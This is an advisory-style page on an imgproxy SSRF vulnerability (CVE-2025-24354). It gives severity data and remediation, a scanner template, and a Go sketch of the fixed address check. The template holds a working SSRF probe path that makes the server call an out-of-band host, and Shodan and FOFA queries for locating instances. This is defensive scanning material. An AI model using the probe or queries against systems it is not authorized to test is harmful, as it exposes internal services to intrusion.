Imgproxy < 3.27.2 - Server-Side Request Forgery (SSRF)

CVE-2025-24354
Early Release

Description

imgproxy does not block the 0.0.0.0 address even when IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES is set to false, which lets local services be exposed; exploitation requires network access.

Severity

Medium

CVSS Score

5.3

Exploit Probability

4%

Affected Product

imgproxy

Published Date

October 24, 2025

Template Author

oksuzkayra

CVE-2025-24354.yaml
id: CVE-2025-24354

info:
  name: Imgproxy < 3.27.2 - Server-Side Request Forgery (SSRF)
  author: oksuzkayra
  severity: medium
  description: |
    imgproxy does not block the 0.0.0.0 address even when IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES is set to false, which lets local services be exposed; exploitation requires network access.
  impact: |
    Local services may be exposed to unauthorized access, risking information disclosure or local system compromise.
  remediation: |
    The vulnerability has been fixed in imgproxy version 3.27.2. The fix involves updating the source address verification to also check for unspecified IP addresses (0.0.0.0) using the ip.IsUnspecified() function in addition to the existing ip.IsLoopback() check.
  reference:
    - https://github.com/imgproxy/imgproxy/commit/3d4fed6842aa8930ec224d0ad75b0079b858e081
    - https://github.com/imgproxy/imgproxy/security/advisories/GHSA-j2hp-6m75-v4j4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-24354
    cwe-id: CWE-918
    epss-score: 0.03658
    epss-percentile: 0.8737
  metadata:
    verified: true
    max-request: 1
    product: imgproxy
    shodan-query: http.html:"imgproxy"
    fofa-query: body="imgproxy"
  tags: cve,cve2025,imgproxy,ssrf,oast,oob

http:
  - method: GET
    path:
      - "{{BaseURL}}/unsafe/plain/http://{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
          - "status_code == 422"
          - "contains(body, 'Invalid source image')"
        condition: and
# digest: 490a004630440220529052b44c3278f3e7c7f6d574e59b7483216b9fc05a1760a7e9ffa70e2c162502205d1096d61cc8bef01c252d4881ed81c23eb37b70b51a2591a33cdd6cf8772be0:922c64590222798bb761d5b6d8e72950
CVSS Metrics

Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID: CVE-2025-24354
CWE ID: CWE-918

Remediation Steps

The vulnerability has been fixed in imgproxy version 3.27.2. The fix involves updating the source address verification to also check for unspecified IP addresses (0.0.0.0) using the ip.IsUnspecified() function in addition to the existing ip.IsLoopback() check.
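The shape of the check described above, as an added illustration that is not imgproxy's own code: the pre-fix predicate consults only ip.IsLoopback(), so 0.0.0.0 (and the IPv6 equivalent ::) passes even with loopback sources disabled, while the fixed predicate also consults ip.IsUnspecified(). The Policy struct, checkSource function and sample URLs are assumptions made for this example.

```go
package main

import (
	"fmt"
	"net"
	"net/url"
)

// Policy stands in for the IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES switch
// (the option name is from the advisory; this struct is an assumption).
type Policy struct {
	AllowLoopback bool
}

// isLoopbackOnly is the pre-3.27.2 shape of the predicate as the advisory
// describes it: only ip.IsLoopback() is consulted, so the unspecified
// addresses 0.0.0.0 and :: are not treated as local and pass the check.
func isLoopbackOnly(ip net.IP) bool {
	return ip.IsLoopback()
}

// isLocalFixed is the 3.27.2 shape: unspecified addresses are treated like
// loopback, because a connection to 0.0.0.0 reaches the local host's
// listeners on common operating systems.
func isLocalFixed(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsUnspecified()
}

// checkSource returns nil when the IP-literal host of rawURL may be fetched
// under the policy, or an error naming why it was rejected. Hostnames are
// deliberately not resolved here; a real verifier must apply the same
// predicate to every address DNS returns for the host.
func checkSource(p Policy, rawURL string, isLocal func(net.IP) bool) error {
	u, err := url.Parse(rawURL)
	if err != nil {
		return err
	}
	ip := net.ParseIP(u.Hostname())
	if ip == nil {
		return fmt.Errorf("host %q is not an IP literal; resolve it and re-check", u.Hostname())
	}
	if !p.AllowLoopback && isLocal(ip) {
		return fmt.Errorf("source %s is a local address and loopback sources are disabled", ip)
	}
	return nil
}

func main() {
	p := Policy{AllowLoopback: false}
	for _, src := range []string{"http://127.0.0.1/a.png", "http://0.0.0.0/a.png", "http://[::]/a.png", "http://203.0.113.5/a.png"} {
		fmt.Printf("%-26s accepted: vulnerable=%v fixed=%v\n", src,
			checkSource(p, src, isLoopbackOnly) == nil, checkSource(p, src, isLocalFixed) == nil)
	}
}
```

Running it shows 0.0.0.0 and :: accepted by the loopback-only predicate and rejected by the fixed one, while 127.0.0.1 is rejected by both and the public address is accepted by both.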